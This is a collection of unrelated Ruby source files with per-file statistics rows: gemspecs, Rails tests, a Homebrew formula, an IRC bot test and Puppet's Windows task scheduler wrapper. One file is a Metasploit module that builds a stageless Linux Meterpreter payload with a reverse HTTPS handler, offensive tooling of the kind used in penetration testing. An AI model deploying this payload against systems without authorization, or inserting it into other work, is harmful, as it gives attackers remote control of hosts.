expect(ttl_policy.created_at).to be_nil
expect(ttl_policy.updated_at).to be_nil
end
context 'with existing policy' do
before do
group.dependency_proxy_image_ttl_policy.update!(ttl: 30, enabled: true)
end
it 'returns the policy if it already exists', :aggregate_failures do
expect(ttl_policy.ttl).to eq(30)
expect(ttl_policy.enabled).to eq(true)
expect(ttl_policy.created_at).not_to be_nil
expect(ttl_policy.updated_at).not_to be_nil
end
end
end
end
| 34.458679 | 186 | 0.669288 |
ab7a06c69d4b0576117c86d299dc851d97fabe2f | 1,341 | $:.push File.expand_path('../lib', __FILE__)
require 'ripple/version'
Gem::Specification.new do |gem|
# Meta
gem.name = "ripple"
gem.version = Ripple::VERSION
gem.summary = %Q{ripple is an object-mapper library for Riak, the distributed database by Basho.}
gem.description = %Q{ripple is an object-mapper library for Riak, the distributed database by Basho. It uses ActiveModel to provide an experience that integrates well with Rails 3 applications.}
gem.email = ["[email protected]"]
gem.homepage = "http://seancribbs.github.com/ripple"
gem.authors = ["Sean Cribbs"]
# Deps
gem.add_development_dependency "rspec", "~>2.8.0"
gem.add_development_dependency 'rake'
gem.add_development_dependency 'ammeter', '~>0.2.2'
gem.add_dependency "riak-client", "~> 1.1.0"
gem.add_dependency "activesupport", [">= 3.0.0", "< 3.3.0"]
gem.add_dependency "activemodel", [">= 3.0.0", "< 3.3.0"]
gem.add_dependency "tzinfo"
# Files
ignores = File.read(".gitignore").split(/\r?\n/).reject{ |f| f =~ /^(#.+|\s*)$/ }.map {|f| Dir[f] }.flatten
gem.files = (Dir['**/*','.gitignore'] - ignores).reject {|f| !File.file?(f) }
gem.test_files = (Dir['spec/**/*','.gitignore'] - ignores).reject {|f| !File.file?(f) }
# gem.executables = Dir['bin/*'].map { |f| File.basename(f) }
gem.require_paths = ['lib']
end
| 44.7 | 197 | 0.654735 |
eda34a0af15bac09c1f239c44e0ed3825bde2348 | 349 | require "rails_helper"
RSpec.describe "Site layout", type: :system do
describe "footer" do
it "is present" do
visit searches_show_path
expect(page).to have_selector('footer')
end
end
describe "header" do
it "is present" do
visit searches_show_path
expect(page).to have_selector('header')
end
end
end | 20.529412 | 46 | 0.673352 |
08d661c67d5e28619f004fac4c95f977503e0258 | 768 | module Fixy
module Formatter
module Alphanumeric
#
# Alphanumeric Formatter
#
# Only contains printable characters and is
# left-justified and filled with spaces.
#
def format_alphanumeric(input, byte_width)
input_string = String.new(input.to_s).tr "#{self.class::LINE_ENDING_CRLF}#{line_ending}", ''
result = ''
if input_string.bytesize <= byte_width
result += input_string
else
input_string.each_char do |char|
if result.bytesize + char.bytesize <= byte_width
result += char
else
break
end
end
end
result + ' ' * (byte_width - result.bytesize)
end
end
end
end
| 23.272727 | 100 | 0.5625 |
d5eda3afafc3364e88786241399f2a38e122eaa9 | 1,325 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/handler/reverse_https'
require 'msf/base/sessions/meterpreter_options'
require 'msf/base/sessions/mettle_config'
require 'msf/base/sessions/meterpreter_aarch64_linux'
module MetasploitModule
CachedSize = 692384
include Msf::Payload::Single
include Msf::Sessions::MeterpreterOptions
include Msf::Sessions::MettleConfig
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Linux Meterpreter, Reverse HTTPS Inline',
'Description' => 'Run the Meterpreter / Mettle server payload (stageless)',
'Author' => [
'Adam Cammack <adam_cammack[at]rapid7.com>',
'Brent Cook <brent_cook[at]rapid7.com>',
'timwr'
],
'Platform' => 'linux',
'Arch' => ARCH_AARCH64,
'License' => MSF_LICENSE,
'Handler' => Msf::Handler::ReverseHttps,
'Session' => Msf::Sessions::Meterpreter_aarch64_Linux
)
)
end
def generate
opts = {
scheme: 'https',
stageless: true
}
MetasploitPayloads::Mettle.new('aarch64-linux-musl', generate_config(opts)).to_binary :exec
end
end
| 28.191489 | 95 | 0.632453 |
edf2e0ea19b741f918438eb8d1eaf781be3e4ed7 | 268 | class Genotype < ApplicationRecord
belongs_to :strain
belongs_to :gene
belongs_to :modification
accepts_nested_attributes_for :gene#,:reject_if => proc { |a| a['title'].blank? }
accepts_nested_attributes_for :modification
validates_presence_of :gene
end
| 24.363636 | 83 | 0.779851 |
e9cc786c566f3ba3ef8111b9087dc81fdcc9be61 | 1,093 | class Pstoedit < Formula
desc "Convert PostScript and PDF files to editable vector graphics"
homepage "http://www.pstoedit.net/"
url "https://downloads.sourceforge.net/project/pstoedit/pstoedit/3.71/pstoedit-3.71.tar.gz"
sha256 "0589cd22cd9c23dee12d9bc9f26760f872185d8a1fb72a05bc58f6b824cfbc95"
bottle do
sha256 "c153dec1a76f7d6a829276145552fc6dc3756322a3023a24506740ee128d9a23" => :high_sierra
sha256 "3f4a82c73fcc2c44bfaa043babe85b8a4190de731752a86a2db553fa18c5bc5d" => :sierra
sha256 "5b4de0d105ec879d80202d8c523e6052769316e29e7eb975f5e2b77b2fc369f4" => :el_capitan
end
depends_on "pkg-config" => :build
depends_on "plotutils"
depends_on "ghostscript"
depends_on "imagemagick"
depends_on "xz" if MacOS.version < :mavericks
def install
system "./configure", "--disable-debug", "--disable-dependency-tracking",
"--prefix=#{prefix}"
system "make", "install"
end
test do
system bin/"pstoedit", "-f", "gs:pdfwrite", test_fixtures("test.ps"), "test.pdf"
assert_predicate testpath/"test.pdf", :exist?
end
end
| 36.433333 | 93 | 0.740165 |
abe48bf23b68a3591dcbb613abbe7d1e241deb6c | 1,207 | # frozen_string_literal: true
# ## Schema Information
#
# Table name: `killmail_fittings`
#
# ### Columns
#
# Name | Type | Attributes
# ------------------ | ------------------ | ---------------------------
# **`items`** | `jsonb` |
# **`similarity`** | `decimal(, )` | `not null`
# **`created_at`** | `datetime` | `not null`
# **`updated_at`** | `datetime` | `not null`
# **`fitting_id`** | `bigint` | `not null, primary key`
# **`killmail_id`** | `bigint` | `not null, primary key`
#
# ### Indexes
#
# * `index_killmail_fittings_on_fitting_id`:
# * **`fitting_id`**
# * `index_killmail_fittings_on_killmail_id`:
# * **`killmail_id`**
#
# ### Foreign Keys
#
# * `fk_rails_...`:
# * **`fitting_id => fittings.id`**
# * `fk_rails_...`:
# * **`killmail_id => killmails.id`**
#
class KillmailFitting < ApplicationRecord
self.primary_keys = :killmail_id, :fitting_id
belongs_to :fitting, inverse_of: :killmail_fittings
belongs_to :killmail, inverse_of: :killmail_fittings
scope :matching, -> { joins(:fitting).where('similarity >= COALESCE(fittings.killmail_match_threshold, 1.0)') }
end
| 30.175 | 113 | 0.551781 |
b90f92c976ccdc79002a83c3c1f8a838576f508b | 572 | require 'securerandom'
module Capistrano
module Postgresql
module PasswordHelpers
def generate_random_password
SecureRandom.hex(10)
end
# This method is invoked only if :pg_password is not already set in config/#{:stage}/deploy.rb. Directly setting :pg_password has precedence.
def ask_for_or_generate_password
if fetch(:pg_ask_for_password)
ask :pg_password, "Postgresql database password for the app: "
else
set :pg_password, generate_random_password
end
end
end
end
end
| 23.833333 | 147 | 0.687063 |
1a9497feb9f218e668ff7808d5629a7f3810bb4f | 2,553 | #-- encoding: UTF-8
#-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2020 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2017 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
module API
module V3
module WorkPackages
module Schema
class SpecificWorkPackageSchema < BaseWorkPackageSchema
attr_reader :work_package
include AssignableCustomFieldValues
include AssignableValuesContract
def initialize(work_package:)
@work_package = work_package
end
delegate :project_id,
:project,
:type,
:id,
:milestone?,
:available_custom_fields,
to: :@work_package
delegate :assignable_types,
:assignable_statuses,
:assignable_categories,
:assignable_priorities,
:assignable_versions,
to: :contract
def no_caching?
true
end
private
def contract
@contract ||= begin
klass = if work_package.new_record?
::WorkPackages::CreateContract
else
::WorkPackages::UpdateContract
end
klass
.new(work_package,
User.current)
end
end
end
end
end
end
end
| 31.134146 | 91 | 0.608696 |
7941d936f5dd8a2b29b383d6fc6ab09c760b2b1e | 2,084 | #!/usr/bin/ruby
###
### $Release: 2.6.6 $
### copyright(c) 2006-2010 kuwata-lab.com all rights reserved.
###
require 'rubygems' unless defined?(Gem)
spec = Gem::Specification.new do |s|
## package information
s.name = "erubis"
s.author = "makoto kuwata"
s.email = "kwa(at)kuwata-lab.com"
s.version = "2.7.0"
s.platform = Gem::Platform::RUBY
s.homepage = "http://www.kuwata-lab.com/erubis/"
s.summary = "a fast and extensible eRuby implementation which supports multi-language"
s.rubyforge_project = 'erubis'
s.description = <<-'END'
Erubis is an implementation of eRuby and has the following features:
* Very fast, almost three times faster than ERB and about 10% faster than eruby.
* Multi-language support (Ruby/PHP/C/Java/Scheme/Perl/Javascript)
* Auto escaping support
* Auto trimming spaces around '<% %>'
* Embedded pattern changeable (default '<% %>')
* Enable to handle Processing Instructions (PI) as embedded pattern (ex. '<?rb ... ?>')
* Context object available and easy to combine eRuby template with YAML datafile
* Print statement available
* Easy to extend and customize in subclass
* Ruby on Rails support
END
## files
files = []
files += Dir.glob('lib/**/*')
files += Dir.glob('bin/*')
files += Dir.glob('examples/**/*')
files += Dir.glob('test/**/*')
files += Dir.glob('doc/**/*')
files += %w[README.txt CHANGES.txt MIT-LICENSE setup.rb]
files += Dir.glob('contrib/**/*')
files += Dir.glob('benchmark/**/*')
files += Dir.glob('doc-api/**/*')
s.files = files
s.executables = ['erubis']
s.bindir = 'bin'
s.test_file = 'test/test.rb'
s.add_dependency('abstract', ['>= 1.0.0'])
end
# Quick fix for Ruby 1.8.3 / YAML bug (thanks to Ross Bamford)
if (RUBY_VERSION == '1.8.3')
def spec.to_yaml
out = super
out = '--- ' + out unless out =~ /^---/
out
end
end
if $0 == __FILE__
#Gem::manage_gems
#Gem::Builder.new(spec).build
require 'rubygems/gem_runner'
Gem::GemRunner.new.run ['build', '$(project).gemspec']
end
spec
| 30.202899 | 92 | 0.636276 |
91fa0f2afa0364f110104085418e3d75f5801909 | 3,748 | require_relative 'test_helper'
class IrcBotTest < Minitest::Test
def setup
@socket = mock('socket')
@irc_message = MockMessage.new
@irc_message.stubs(type: :PRIVMSG, method_symbol: "on_privmsg_messages")
@plugin = MockPlugin.new
@plugin_responses = ['RESPONSE1', 'RESPONSE2']
end
def test_instantiates_plugin
plugin = Minitest::Mock.new
MockPlugin.expects(:new).returns(plugin)
bot = IrcBot.new(@socket, plugins: ['MockPlugin'])
plugin.verify
assert_equal 1, bot.plugins.count
end
def test_raises_argument_error_if_plugin_isnt_valid
assert_raises ArgumentError do
IrcBot.new(@socket, plugins: ['MockInvalidPlugin'])
end
end
def test_sends_the_correct_messages_for_type
@plugin.expects(:on_all_messages).with(@irc_message)
@plugin.expects(:on_privmsg_messages).with(@irc_message)
bot = IrcBot.new(@socket)
bot.plugins << @plugin
bot.notify_plugins(@irc_message)
end
def test_collates_plugin_responses
@plugin.stubs(:on_all_messages).returns(@plugin_responses[0])
plugin_2 = MockPlugin.new
plugin_2.stubs(:on_privmsg_messages).returns(@plugin_responses[1])
bot = IrcBot.new(@socket)
bot.plugins = [@plugin, plugin_2]
assert_equal @plugin_responses, bot.notify_plugins(@irc_message)
end
def test_handles_plugin_expections
exception = Exception.new('Test Exception')
@plugin.stubs(:on_all_messages).returns(@plugin_responses[0])
@plugin.stubs(:on_privmsg_messages).raises(exception)
bot = IrcBot.new(@socket)
bot.plugins << @plugin
assert_equal [@plugin_responses[0], exception], bot.notify_plugins(@irc_message)
end
def test_handles_irc_message_from_plugin
message = IrcTools::PongMessage.new(:server => 'server')
bot = IrcBot.new(@socket)
bot.expects(:write_to_server).with(message)
bot.handle_responses [message]
end
def test_handles_string_message_from_plugin
message = 'PONG :server'
bot = IrcBot.new(@socket)
bot.expects(:write_to_server).with(message)
bot.handle_responses [message]
end
def test_handles_control_message_from_plugin
message = ControlMessage.new(:disconnect)
bot = IrcBot.new(@socket)
bot.expects(:execute_control_message).with(message)
bot.handle_responses [message]
end
def test_executes_the_correct_function_from_control_message
message = ControlMessage.new(:disconnect)
bot = IrcBot.new(@socket)
bot.expects(:disconnect)
bot.execute_control_message message
end
def test_execute_control_message_handles_absent_control_method
message = ControlMessage.new(:non_existant_ctrl_method)
bot = IrcBot.new(@socket)
bot.execute_control_message message
end
def test_bot_terminates_with_false_reload_flag_when_disconnected
@socket.expects(:write).with('QUIT')
@socket.expects(:connect)
@socket.expects(:disconnect)
irc_bot = IrcBot.new(@socket)
irc_bot.send(:disconnect)
assert_equal false, irc_bot.start
end
def test_bot_terminates_with_true_reload_flag_when_reloaded
@socket.expects(:write).with('QUIT')
@socket.expects(:connect)
@socket.expects(:disconnect)
irc_bot = IrcBot.new(@socket)
irc_bot.send(:reload)
assert_equal true, irc_bot.start
end
def test_bot_shutsdown_gracefully
irc_bot = IrcBot.new(@socket)
@socket.expects(:connect)
@socket.expects(:disconnect)
irc_bot.send(:disconnect)
irc_bot.expects(:write_to_server).with(IrcTools::QuitMessage.new)
irc_bot.start
end
end
class MockPlugin < IrcPlugin
def on_all_messages(message); nil; end
def on_privmsg_messages(message); nil; end
end
class MockInvalidPlugin
end
class MockMessage
attr_reader :type
end
| 25.324324 | 84 | 0.739861 |
ff26cff5b34466e2cfa1cabb9524e7e30223a53e | 46,260 | # frozen_string_literal: true
# DO NOT EDIT, ALTER, OR DELETE THIS FILE
# This file is copied from core puppet and frozen
# It is used in spec tests to ensure compatibility
# between this module and the old built-in type.
# Frozen from: https://github.com/puppetlabs/puppet/blob/5.5.3/lib/puppet/util/windows/taskscheduler.rb
require 'puppet/util/windows'
# disabling some false positives on the FFI definitions
# rubocop:disable Naming/ClassAndModuleCamelCase,Naming/ConstantName,Lint/Void
# The TaskScheduler class encapsulates taskscheduler settings and behavior
class Win32::TaskScheduler
include Puppet::Util::Windows::String
require 'ffi'
extend FFI::Library
# The error class raised if any task scheduler specific calls fail.
class Error < Puppet::Util::Windows::Error; end
class << self
attr_accessor :com_initialized
end
# :stopdoc:
TASK_TIME_TRIGGER_ONCE = :TASK_TIME_TRIGGER_ONCE
TASK_TIME_TRIGGER_DAILY = :TASK_TIME_TRIGGER_DAILY
TASK_TIME_TRIGGER_WEEKLY = :TASK_TIME_TRIGGER_WEEKLY
TASK_TIME_TRIGGER_MONTHLYDATE = :TASK_TIME_TRIGGER_MONTHLYDATE
TASK_TIME_TRIGGER_MONTHLYDOW = :TASK_TIME_TRIGGER_MONTHLYDOW
TASK_EVENT_TRIGGER_ON_IDLE = :TASK_EVENT_TRIGGER_ON_IDLE
TASK_EVENT_TRIGGER_AT_SYSTEMSTART = :TASK_EVENT_TRIGGER_AT_SYSTEMSTART
TASK_EVENT_TRIGGER_AT_LOGON = :TASK_EVENT_TRIGGER_AT_LOGON
TASK_SUNDAY = 0x1
TASK_MONDAY = 0x2
TASK_TUESDAY = 0x4
TASK_WEDNESDAY = 0x8
TASK_THURSDAY = 0x10
TASK_FRIDAY = 0x20
TASK_SATURDAY = 0x40
TASK_FIRST_WEEK = 1
TASK_SECOND_WEEK = 2
TASK_THIRD_WEEK = 3
TASK_FOURTH_WEEK = 4
TASK_LAST_WEEK = 5
TASK_JANUARY = 0x1
TASK_FEBRUARY = 0x2
TASK_MARCH = 0x4
TASK_APRIL = 0x8
TASK_MAY = 0x10
TASK_JUNE = 0x20
TASK_JULY = 0x40
TASK_AUGUST = 0x80
TASK_SEPTEMBER = 0x100
TASK_OCTOBER = 0x200
TASK_NOVEMBER = 0x400
TASK_DECEMBER = 0x800
TASK_FLAG_INTERACTIVE = 0x1
TASK_FLAG_DELETE_WHEN_DONE = 0x2
TASK_FLAG_DISABLED = 0x4
TASK_FLAG_START_ONLY_IF_IDLE = 0x10
TASK_FLAG_KILL_ON_IDLE_END = 0x20
TASK_FLAG_DONT_START_IF_ON_BATTERIES = 0x40
TASK_FLAG_KILL_IF_GOING_ON_BATTERIES = 0x80
TASK_FLAG_RUN_ONLY_IF_DOCKED = 0x100
TASK_FLAG_HIDDEN = 0x200
TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET = 0x400
TASK_FLAG_RESTART_ON_IDLE_RESUME = 0x800
TASK_FLAG_SYSTEM_REQUIRED = 0x1000
TASK_FLAG_RUN_ONLY_IF_LOGGED_ON = 0x2000
TASK_TRIGGER_FLAG_HAS_END_DATE = 0x1
TASK_TRIGGER_FLAG_KILL_AT_DURATION_END = 0x2
TASK_TRIGGER_FLAG_DISABLED = 0x4
TASK_MAX_RUN_TIMES = 1440
TASKS_TO_RETRIEVE = 5
# COM
CLSID_CTask = FFI::WIN32::GUID['148BD520-A2AB-11CE-B11F-00AA00530503']
IID_ITask = FFI::WIN32::GUID['148BD524-A2AB-11CE-B11F-00AA00530503']
IID_IPersistFile = FFI::WIN32::GUID['0000010b-0000-0000-C000-000000000046']
SCHED_S_TASK_READY = 0x00041300
SCHED_S_TASK_RUNNING = 0x00041301
SCHED_S_TASK_HAS_NOT_RUN = 0x00041303
SCHED_S_TASK_NOT_SCHEDULED = 0x00041305
# HRESULT error codes
# https://blogs.msdn.com/b/eldar/archive/2007/04/03/a-lot-of-hresult-codes.aspx
# in Ruby, an 0x8XXXXXXX style HRESULT can be resolved to 2s complement
# by using "0x8XXXXXXX".to_i(16) - - 0x100000000
# rubocop:disable Style/NumericLiterals
SCHED_E_ACCOUNT_INFORMATION_NOT_SET = -2147216625 # 0x8004130F
SCHED_E_NO_SECURITY_SERVICES = -2147216622 # 0x80041312
# No mapping between account names and security IDs was done.
ERROR_NONE_MAPPED = -2147023564 # 0x80070534 WIN32 Error CODE 1332 (0x534)
# rubocop:enable Style/NumericLiterals
# :startdoc:
# Shorthand constants
IDLE = Puppet::Util::Windows::Process::IDLE_PRIORITY_CLASS
NORMAL = Puppet::Util::Windows::Process::NORMAL_PRIORITY_CLASS
HIGH = Puppet::Util::Windows::Process::HIGH_PRIORITY_CLASS
REALTIME = Puppet::Util::Windows::Process::REALTIME_PRIORITY_CLASS
BELOW_NORMAL = Puppet::Util::Windows::Process::BELOW_NORMAL_PRIORITY_CLASS
ABOVE_NORMAL = Puppet::Util::Windows::Process::ABOVE_NORMAL_PRIORITY_CLASS
ONCE = TASK_TIME_TRIGGER_ONCE
DAILY = TASK_TIME_TRIGGER_DAILY
WEEKLY = TASK_TIME_TRIGGER_WEEKLY
MONTHLYDATE = TASK_TIME_TRIGGER_MONTHLYDATE
MONTHLYDOW = TASK_TIME_TRIGGER_MONTHLYDOW
ON_IDLE = TASK_EVENT_TRIGGER_ON_IDLE
AT_SYSTEMSTART = TASK_EVENT_TRIGGER_AT_SYSTEMSTART
AT_LOGON = TASK_EVENT_TRIGGER_AT_LOGON
FIRST_WEEK = TASK_FIRST_WEEK
SECOND_WEEK = TASK_SECOND_WEEK
THIRD_WEEK = TASK_THIRD_WEEK
FOURTH_WEEK = TASK_FOURTH_WEEK
LAST_WEEK = TASK_LAST_WEEK
SUNDAY = TASK_SUNDAY
MONDAY = TASK_MONDAY
TUESDAY = TASK_TUESDAY
WEDNESDAY = TASK_WEDNESDAY
THURSDAY = TASK_THURSDAY
FRIDAY = TASK_FRIDAY
SATURDAY = TASK_SATURDAY
JANUARY = TASK_JANUARY
FEBRUARY = TASK_FEBRUARY
MARCH = TASK_MARCH
APRIL = TASK_APRIL
MAY = TASK_MAY
JUNE = TASK_JUNE
JULY = TASK_JULY
AUGUST = TASK_AUGUST
SEPTEMBER = TASK_SEPTEMBER
OCTOBER = TASK_OCTOBER
NOVEMBER = TASK_NOVEMBER
DECEMBER = TASK_DECEMBER
INTERACTIVE = TASK_FLAG_INTERACTIVE
DELETE_WHEN_DONE = TASK_FLAG_DELETE_WHEN_DONE
DISABLED = TASK_FLAG_DISABLED
START_ONLY_IF_IDLE = TASK_FLAG_START_ONLY_IF_IDLE
KILL_ON_IDLE_END = TASK_FLAG_KILL_ON_IDLE_END
DONT_START_IF_ON_BATTERIES = TASK_FLAG_DONT_START_IF_ON_BATTERIES
KILL_IF_GOING_ON_BATTERIES = TASK_FLAG_KILL_IF_GOING_ON_BATTERIES
RUN_ONLY_IF_DOCKED = TASK_FLAG_RUN_ONLY_IF_DOCKED
HIDDEN = TASK_FLAG_HIDDEN
RUN_IF_CONNECTED_TO_INTERNET = TASK_FLAG_RUN_IF_CONNECTED_TO_INTERNET
RESTART_ON_IDLE_RESUME = TASK_FLAG_RESTART_ON_IDLE_RESUME
SYSTEM_REQUIRED = TASK_FLAG_SYSTEM_REQUIRED
RUN_ONLY_IF_LOGGED_ON = TASK_FLAG_RUN_ONLY_IF_LOGGED_ON
FLAG_HAS_END_DATE = TASK_TRIGGER_FLAG_HAS_END_DATE
FLAG_KILL_AT_DURATION_END = TASK_TRIGGER_FLAG_KILL_AT_DURATION_END
FLAG_DISABLED = TASK_TRIGGER_FLAG_DISABLED
MAX_RUN_TIMES = TASK_MAX_RUN_TIMES
# unfortunately MSTask.h does not specify the limits for any settings
# so these were determined with some experimentation
# if values too large are written, its suspected there may be internal
# limits may be exceeded, corrupting the job
# used for max application name and path values
MAX_PATH = 260
# UNLEN from lmcons.h is 256
# https://technet.microsoft.com/it-it/library/bb726984(en-us).aspx specifies 104
MAX_ACCOUNT_LENGTH = 256
# command line max length is limited to 8191, choose something high but still enough that we don't blow out CLI
MAX_PARAMETERS_LENGTH = 4096
# in testing, this value could be set to a length of 99999, but saving / loading the task failed
MAX_COMMENT_LENGTH = 8192
# Returns a new TaskScheduler object. If a work_item (and possibly the
# the trigger) are passed as arguments then a new work item is created and
# associated with that trigger, although you can still activate other tasks
# with the same handle.
#
# This is really just a bit of convenience. Passing arguments to the
# constructor is the same as calling TaskScheduler.new plus
# TaskScheduler#new_work_item.
#
def initialize(work_item = nil, trigger = nil)
@pits = nil
@pitask = nil
unless self.class.com_initialized
Puppet::Util::Windows::COM.InitializeCom()
self.class.com_initialized = true
end
@pits = COM::TaskScheduler.new
at_exit do
begin
@pits.Release if @pits && [email protected]?
@pits = nil
rescue # rubocop:disable Lint/SuppressedException
end
end
raise TypeError if work_item && trigger && !trigger.is_a?(Hash)
new_work_item(work_item, trigger) if work_item && trigger
end
# Returns an array of scheduled task names.
#
def enum
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
array = []
@pits.UseInstance(COM::EnumWorkItems, :Enum) do |pi_enum|
FFI::MemoryPointer.new(:pointer) do |names_array_ptr_ptr|
FFI::MemoryPointer.new(:win32_ulong) do |fetched_count_ptr|
# awkward usage, if number requested is available, returns S_OK (0), or if less were returned returns S_FALSE (1)
while pi_enum.Next(TASKS_TO_RETRIEVE, names_array_ptr_ptr, fetched_count_ptr) >= Puppet::Util::Windows::COM::S_OK
count = fetched_count_ptr.read_win32_ulong
break if count == 0
names_array_ptr_ptr.read_com_memory_pointer do |names_array_ptr|
# iterate over the array of pointers
name_ptr_ptr = FFI::Pointer.new(:pointer, names_array_ptr)
(0...count).each do |i|
name_ptr_ptr[i].read_com_memory_pointer do |name_ptr|
array << name_ptr.read_arbitrary_wide_string_up_to(MAX_PATH)
end
end
end
end
end
end
end
array
end
alias tasks enum
# Activate the specified task.
#
def activate(task)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise TypeError unless task.is_a?(String)
FFI::MemoryPointer.new(:pointer) do |ptr|
@pits.Activate(wide_string(task), IID_ITask, ptr)
reset_current_task
@pitask = COM::Task.new(ptr.read_pointer)
end
@pitask
end
# Delete the specified task name.
#
def delete(task)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise TypeError unless task.is_a?(String)
@pits.Delete(wide_string(task))
true
end
# Execute the current task.
#
def run
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.Run
end
# Saves the current task. Tasks must be saved before they can be activated.
# The .job file itself is typically stored in the C:\WINDOWS\Tasks folder.
#
# If +file+ (an absolute path) is specified then the job is saved to that
# file instead. A '.job' extension is recommended but not enforced.
#
def save(file = nil)
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise Error, _('Account information must be set on the current task to save it properly.') unless @account_information_set
reset = true
begin
@pitask.QueryInstance(COM::PersistFile) do |pi_persist_file|
wide_file = wide_string(file)
pi_persist_file.Save(wide_file, 1)
pi_persist_file.SaveCompleted(wide_file)
end
rescue
reset = false
ensure
reset_current_task if reset
end
end
# Terminate the current task.
#
def terminate
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
@pitask.Terminate
end
# Set the host on which the various TaskScheduler methods will execute.
#
def machine=(host)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise TypeError unless host.is_a?(String)
@pits.SetTargetComputer(wide_string(host))
host
end
alias host= machine=
# Sets the +user+ and +password+ for the given task. If the user and
# password are set properly then true is returned.
#
# In some cases the job may be created, but the account information was
# bad. In this case the task is created but a warning is generated and
# false is returned.
#
# Note that if intending to use SYSTEM, specify an empty user and nil password
#
# Calling task.set_account_information('SYSTEM', nil) will generally not
# work, except for one special case where flags are also set like:
# task.flags = Win32::TaskScheduler::TASK_FLAG_RUN_ONLY_IF_LOGGED_ON
#
# This must be done prior to the 1st save() call for the task to be
# properly registered and visible through the MMC snap-in / schtasks.exe
#
def set_account_information(user, password)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
bool = false
begin
if (user.nil? || user == '') && (password.nil? || password == '')
@pitask.SetAccountInformation(wide_string(''), FFI::Pointer::NULL)
else
if user.length > MAX_ACCOUNT_LENGTH
raise Error, _('User has exceeded maximum allowed length %{max}') % { max: MAX_ACCOUNT_LENGTH }
end
user = wide_string(user)
password = wide_string(password)
@pitask.SetAccountInformation(user, password)
end
@account_information_set = true
bool = true
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_E_ACCOUNT_INFORMATION_NOT_SET
warn _('job created, but password was invalid')
end
bool
end
# Returns the user associated with the task or nil if no user has yet
# been associated with the task.
#
def account_information
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
# default under certain failures
user = nil
begin
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetAccountInformation(ptr)
ptr.read_com_memory_pointer do |str_ptr|
user = str_ptr.read_arbitrary_wide_string_up_to(MAX_ACCOUNT_LENGTH) unless str_ptr.null?
end
end
rescue Puppet::Util::Windows::Error => e
raise e unless e.code == SCHED_E_ACCOUNT_INFORMATION_NOT_SET ||
e.code == SCHED_E_NO_SECURITY_SERVICES ||
e.code == ERROR_NONE_MAPPED
end
user
end
# Returns the name of the application associated with the task.
#
def application_name
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
app = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetApplicationName(ptr)
ptr.read_com_memory_pointer do |str_ptr|
app = str_ptr.read_arbitrary_wide_string_up_to(MAX_PATH) unless str_ptr.null?
end
end
app
end
# Sets the application name associated with the task.
#
def application_name=(app)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless app.is_a?(String)
# the application name is written to a .job file on disk, so is subject to path limitations
if app.length > MAX_PATH
raise Error, _('Application name has exceeded maximum allowed length %{max}') % { max: MAX_PATH }
end
@pitask.SetApplicationName(wide_string(app))
app
end
# Returns the command line parameters for the task.
#
def parameters
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
param = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetParameters(ptr)
ptr.read_com_memory_pointer do |str_ptr|
param = str_ptr.read_arbitrary_wide_string_up_to(MAX_PARAMETERS_LENGTH) unless str_ptr.null?
end
end
param
end
# Sets the parameters for the task. These parameters are passed as command
# line arguments to the application the task will run. To clear the command
# line parameters set it to an empty string.
#
def parameters=(param)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
raise TypeError unless param.is_a?(String)
if param.length > MAX_PARAMETERS_LENGTH
raise Error, _('Parameters has exceeded maximum allowed length %{max}') % { max: MAX_PARAMETERS_LENGTH }
end
@pitask.SetParameters(wide_string(param))
param
end
# Returns the working directory for the task.
#
def working_directory
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
dir = nil
FFI::MemoryPointer.new(:pointer) do |ptr|
@pitask.GetWorkingDirectory(ptr)
ptr.read_com_memory_pointer do |str_ptr|
dir = str_ptr.read_arbitrary_wide_string_up_to(MAX_PATH) unless str_ptr.null?
end
end
dir
end
# Sets the working directory for the task.
#
def working_directory=(dir)
raise Error, _('No current task scheduler. ITaskScheduler is NULL.') if @pits.nil?
raise Error, _('No currently active task. ITask is NULL.') if @pitask.nil?
